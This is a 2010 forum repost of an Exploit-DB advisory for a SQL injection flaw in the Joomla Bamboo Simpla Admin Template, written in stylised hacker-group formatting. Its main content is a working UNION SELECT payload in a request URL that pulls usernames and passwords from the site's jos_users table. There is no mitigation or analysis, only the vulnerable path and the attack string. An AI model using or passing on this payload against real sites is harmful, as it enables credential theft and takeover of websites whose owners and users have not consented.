hozarares Posted January 3, 2010 Report Posted January 3, 2010 # Title: Joomla Bamboo Simpla Admin Template SQL Injection Vulnerability # EDB-ID: 10971 # CVE-ID: () # OSVDB-ID: () # Author: R3d-D3v!L # Published: 2010-01-03 # Verified: no # Download Exploit Code# Download N/Aview sourceprint?[?] ?????????????????????????{In The Name Of Allah The Mercifull}?????????????????????? [?] [~] Tybe: Joomla Bamboo Simpla Admin Template suffer from REMOTe sql injection [~] Vendor: .joomlabamboo.com [?] Software:Joomla Bamboo Simpla Admin Template [-] [?] author: ((R3d-D3v!L)) [?] TEAM: ArAB!AN !NFORMAT!ON SeCuR!TY [?] contact: N/A [-] [?] Date: 3.Jan.2010 [?] T!ME: 09:15 am GMT [?] Home: XP10_hackEr [?] [?] [-]??????????????????????{DEV!L'5 of SYST3M}?????????????????? [*] Err0r C0N50L3: http://server/P47H/index.php?option=com_content&view=article&id= {EV!L EXPLO!T} [~] {EV!L EXPLO!T}: -666/**/union/**/select/**/1,2,concat(username,0x3a,password),4,5,6,7,8/**/from/**/jos_users-- Quote
